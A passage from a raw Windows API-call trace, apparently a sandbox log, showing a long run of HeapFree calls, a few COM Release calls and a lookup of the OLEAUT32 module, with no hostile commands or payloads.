lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4242f0 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4336f8 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42d840 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470808 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46fb88 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46fba8 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46fbc8 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46fbe8 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46fc08 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46fc28 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46fc48 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: 
hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46fc68 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46fc88 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46fca8 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46fcc8 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46fce8 | out: hHeap=0x410000) returned 1 [0077.177] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473240 | out: hHeap=0x410000) returned 1 [0077.177] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42d8e8 | out: hHeap=0x410000) returned 1 [0077.177] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x433538 | out: hHeap=0x410000) returned 1 [0077.177] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.177] LsDestroyContext () returned 0x0 [0077.177] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x468910 | out: hHeap=0x410000) returned 1 [0077.177] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x453978 | out: hHeap=0x410000) returned 1 [0077.177] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47b338 | out: hHeap=0x410000) returned 1 [0077.177] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4539a8 | out: hHeap=0x410000) returned 1 [0077.177] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46c678 | out: hHeap=0x410000) returned 1 [0077.177] HeapFree (in: hHeap=0x410000, dwFlags=0x0, 
lpMem=0x472190 | out: hHeap=0x410000) returned 1 [0077.177] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47b628 | out: hHeap=0x410000) returned 1 [0077.177] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45f380 | out: hHeap=0x410000) returned 1 [0077.177] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4721e0 | out: hHeap=0x410000) returned 1 [0077.177] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4721b8 | out: hHeap=0x410000) returned 1 [0077.177] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x472208 | out: hHeap=0x410000) returned 1 [0077.177] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x472230 | out: hHeap=0x410000) returned 1 [0077.177] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47b6d0 | out: hHeap=0x410000) returned 1 [0077.177] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4613c0 | out: hHeap=0x410000) returned 1 [0077.177] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4613d0 | out: hHeap=0x410000) returned 1 [0077.178] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4613e0 | out: hHeap=0x410000) returned 1 [0077.178] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4613f0 | out: hHeap=0x410000) returned 1 [0077.178] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47bad8 | out: hHeap=0x410000) returned 1 [0077.178] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47bc08 | out: hHeap=0x410000) returned 1 [0077.178] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47bd30 | out: hHeap=0x410000) returned 1 [0077.178] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47be40 | out: hHeap=0x410000) returned 1 [0077.178] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x468a28 | out: hHeap=0x410000) returned 1 [0077.178] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47c1f8 | out: hHeap=0x410000) returned 1 [0077.178] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47c2c8 | out: hHeap=0x410000) returned 1 [0077.178] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x422038 | out: hHeap=0x410000) 
returned 1 [0077.178] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46fde8 | out: hHeap=0x410000) returned 1 [0077.178] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47ca70 | out: hHeap=0x410000) returned 1 [0077.178] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47a5b8 | out: hHeap=0x410000) returned 1 [0077.178] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47d130 | out: hHeap=0x410000) returned 1 [0077.178] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47c558 | out: hHeap=0x410000) returned 1 [0077.178] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47c6f8 | out: hHeap=0x410000) returned 1 [0077.178] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47c7c8 | out: hHeap=0x410000) returned 1 [0077.179] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44fb50 | out: hHeap=0x410000) returned 1 [0077.179] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47c460 | out: hHeap=0x410000) returned 1 [0077.179] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47bf78 | out: hHeap=0x410000) returned 1 [0077.179] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47c960 | out: hHeap=0x410000) returned 1 [0077.179] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47acc0 | out: hHeap=0x410000) returned 1 [0077.179] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4737f0 | out: hHeap=0x410000) returned 1 [0077.179] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47d3b0 | out: hHeap=0x410000) returned 1 [0077.179] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47e908 | out: hHeap=0x410000) returned 1 [0077.179] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47e848 | out: hHeap=0x410000) returned 1 [0077.179] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47d068 | out: hHeap=0x410000) returned 1 [0077.179] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cfa0 | out: hHeap=0x410000) returned 1 [0077.179] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.179] HeapFree (in: 
hHeap=0x410000, dwFlags=0x0, lpMem=0x47aa68 | out: hHeap=0x410000) returned 1 [0077.180] IUnknown:Release (This=0x461810) returned 0x0 [0077.180] IUnknown:Release (This=0x443704) returned 0x0 [0077.180] IUnknown:Release (This=0x750296bc) returned 0x7fff [0077.180] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42da70 | out: hHeap=0x410000) returned 1 [0077.180] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.180] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43fab8 | out: hHeap=0x410000) returned 1 [0077.180] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.180] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.180] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.180] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.180] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.180] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.180] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.180] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.180] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.180] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.180] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.180] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.180] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.180] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.180] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | 
out: hHeap=0x410000) returned 1 [0077.180] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.180] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.180] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.181] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.181] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.181] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.181] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.181] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.181] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.181] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.181] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.182] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.182] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.182] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.182] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.182] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.182] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.182] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.182] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.182] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 
[0077.182] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.182] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.182] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.182] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.182] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.182] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.182] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.182] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.182] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.182] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.182] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.182] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.182] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.182] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.182] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.182] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: 
hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 
| out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 
[0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: 
hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 
| out: hHeap=0x410000) returned 1 [0077.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44cc58 | out: hHeap=0x410000) returned 1 [0077.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44cb58 | out: hHeap=0x410000) returned 1 [0077.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.186] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44c808 | out: hHeap=0x410000) returned 1 [0077.186] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4294a0 | out: hHeap=0x410000) returned 1 [0077.186] IUnknown:Release (This=0x43f360) returned 0x0 [0077.186] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.186] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4248a0 | out: hHeap=0x410000) returned 1 [0077.186] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.186] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44a610 | out: hHeap=0x410000) returned 1 [0077.186] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x444960 | out: hHeap=0x410000) returned 1 [0077.186] GetModuleHandleW (lpModuleName="OLEAUT32") returned 0x76e40000 [0077.186] GetProcAddress 
